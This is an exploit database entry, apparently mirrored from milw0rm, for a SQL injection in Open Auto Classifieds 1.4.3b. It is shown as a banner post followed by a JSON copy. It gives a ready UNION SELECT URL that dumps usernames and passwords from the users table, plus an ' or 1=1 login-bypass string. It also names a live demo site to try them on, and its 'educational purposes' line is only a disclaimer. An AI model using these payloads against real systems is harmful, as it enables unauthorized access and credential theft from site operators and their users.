Search...

Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities

2008-05-02T00:00:00

ID SSV:17223
Type seebug
Reporter Root
Modified 2008-05-02T00:00:00

Description

No description provided by source.

                                        
                                            
                                                |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ &gt;&gt; Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Remote SQL Injection


Author :: InjEctOr [s0f (at) w.cn]

&amp;&amp; Fisher762 [SQ7 (at) w.cn]



Application :: Open Auto Classifieds vehicle listings manager v1.4.3b

Download :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip


Dork 1 :: use your mind


Greets :: Allah , Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.



--------------------------------------------[C o n t e x t]-----------------------------------------


Expl0!t::

url :

http://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users


and  bypass login:

http://openautoclassifieds.com/login.php &lt;&lt; from demo site :)

in Username field just type ' or 1=1 /*


note:

there is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same

# milw0rm.com [2008-05-02]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-17223", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-05-02T00:00:00", "title": "Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17223", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2008-05-02T00:00:00", "sourceData": "\n |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\nTitle :: Remote SQL Injection\n\n\nAuthor :: InjEctOr [s0f (at) w.cn]\n\n&& Fisher762 [SQ7 (at) w.cn]\n\n\n\nApplication :: Open Auto Classifieds vehicle listings manager v1.4.3b\n\nDownload :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip\n\n\nDork 1 :: use your mind\n\n\nGreets :: Allah , Muslims Hackers\n\nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.\n\n\n\n--------------------------------------------[C o n t e x t]-----------------------------------------\n\n\nExpl0!t::\n\nurl :\n\nhttp://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users\n\n\nand bypass login:\n\nhttp://openautoclassifieds.com/login.php << from demo site :)\n\nin Username field just type ' or 1=1 /*\n\n\nnote:\n\nthere is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same\n\n# milw0rm.com [2008-05-02]\n\n ", "id": "SSV:17223", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:46:12", "reporter": "Root", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T21:46:12", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:46:12", "rev": 2}, "vulnersScore": 0.2}, "references": [], "immutableFields": []}